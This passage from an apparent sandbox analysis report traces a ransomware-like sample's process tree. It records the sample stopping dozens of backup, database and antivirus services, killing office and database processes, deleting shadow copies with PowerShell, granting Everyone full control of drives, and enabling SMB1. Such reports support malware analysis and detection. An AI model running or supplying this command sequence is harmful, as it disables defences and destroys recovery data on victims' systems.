    C:\Windows\system32\net1 stop sms_site_sql_backup /y
    3⤵
    PID:5800
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:3296
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:944
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3604
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:2612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:5364
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:3372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
    3⤵
    PID:6928
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:3312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:6864
- C:\Windows\system32\net.exe
  "net.exe" stop vapiendpoint /y
  2⤵
  PID:1404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop vapiendpoint /y
    3⤵
    PID:3276
- C:\Windows\system32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:2168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:3252
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:4088
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:1872
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:2200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:6684
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:3788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:2836
- C:\Windows\system32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:3912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:5376
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:3816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:6708
- C:\Windows\system32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:4024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:1080
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:3688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4548
- C:\Windows\system32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:5540
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:3944
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:6676
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:3712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:5604
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:1908
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:3228
- C:\Windows\system32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:3736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
    3⤵
    PID:6608
- C:\Windows\system32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:1484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:4876
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:3660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:6376
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:2084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:6660
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:3680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:2604
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:4000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:5964
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:2108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:3140
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:3056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:4004
- C:\Windows\system32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:3832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:5588
- C:\Windows\system32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:3952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:4908
- C:\Windows\system32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:1840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:6692
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL57 /y
  2⤵
  PID:3596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL57 /y
    3⤵
    PID:6700
- C:\Windows\system32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:2996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:5624
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:3644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:2312
- C:\Windows\system32\net.exe
  "net.exe" stop MySQL80 /y
  2⤵
  PID:2988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MySQL80 /y
    3⤵
    PID:1368
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4200
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4232
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4224
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4216
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4208
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4192
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4184
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4176
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4168
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4160
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4152
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4144
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4136
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4120
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4112
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:2684
- C:\Windows\system32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:3520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:3892
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:2800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:6848
- C:\Windows\system32\net.exe
  "net.exe" stop McTaskManager /y
  2⤵
  PID:3588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:840
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:4056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:2104
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:3068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:6812
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4384
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4452
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4444
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:4436
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4428
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4416
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4408
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4564
- C:\Windows\system32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:4580
- C:\Windows\system32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  PID:4588
- C:\Windows\system32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4596
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  PID:4548
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4532
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4524
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4516
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4500
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4484
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4476
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4400
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4392
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4376
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4368
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4360
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4352
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4344
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4336
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4328
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4320
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4312
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4304
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4296
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4288
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4280
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4272
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4264
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4256
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4240
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:1548
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:3564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:6668
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:3880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:6372
- C:\Windows\system32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:3896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:6452
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:3904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:3240
- C:\Windows\system32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:3856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:6652
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:3888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:3516
- C:\Windows\system32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:3360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:4576
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:2228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:4600
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:2348
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:3020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:2180
- C:\Windows\system32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:3024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:3492
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:3004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:1036
- C:\Windows\system32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:3568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:6636
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:3772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:6716
- C:\Windows\system32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:2760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:6756
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:2304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:6368
- C:\Windows\system32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:2384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:7052
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:3540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:944
- C:\Windows\system32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:3460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:1956
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:2936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:7152
- C:\Windows\system32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:2744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:3208
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:3444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:7060
- C:\Windows\system32\net.exe
  "net.exe" stop DCAgent /y
  2⤵
  PID:2896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:6820
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:2696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:2900
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3572
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:6808
- C:\Windows\system32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:2632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:6644
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:2848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:6800
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:3412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
    3⤵
    PID:6456
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:3908
- C:\Windows\system32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:2880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:3340
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:2680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:3192
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:2816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:1152
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:2864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:3604
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:2648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:7000
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:2444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:5464
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Web Control Service” /y
  2⤵
  PID:3404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    3⤵
    PID:2224
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:2172
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:3124
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:2140
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:2812
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:3500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
    3⤵
    PID:5104
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:2596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:7044
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:2480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6360
- C:\Windows\system32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:3468
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop audioendpointbuilder /y
    3⤵
    PID:3972
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:2628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:6964
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:1152
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:3536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:3096
- C:\Windows\system32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:2676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    3⤵
    PID:3700
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:2404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:5388
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
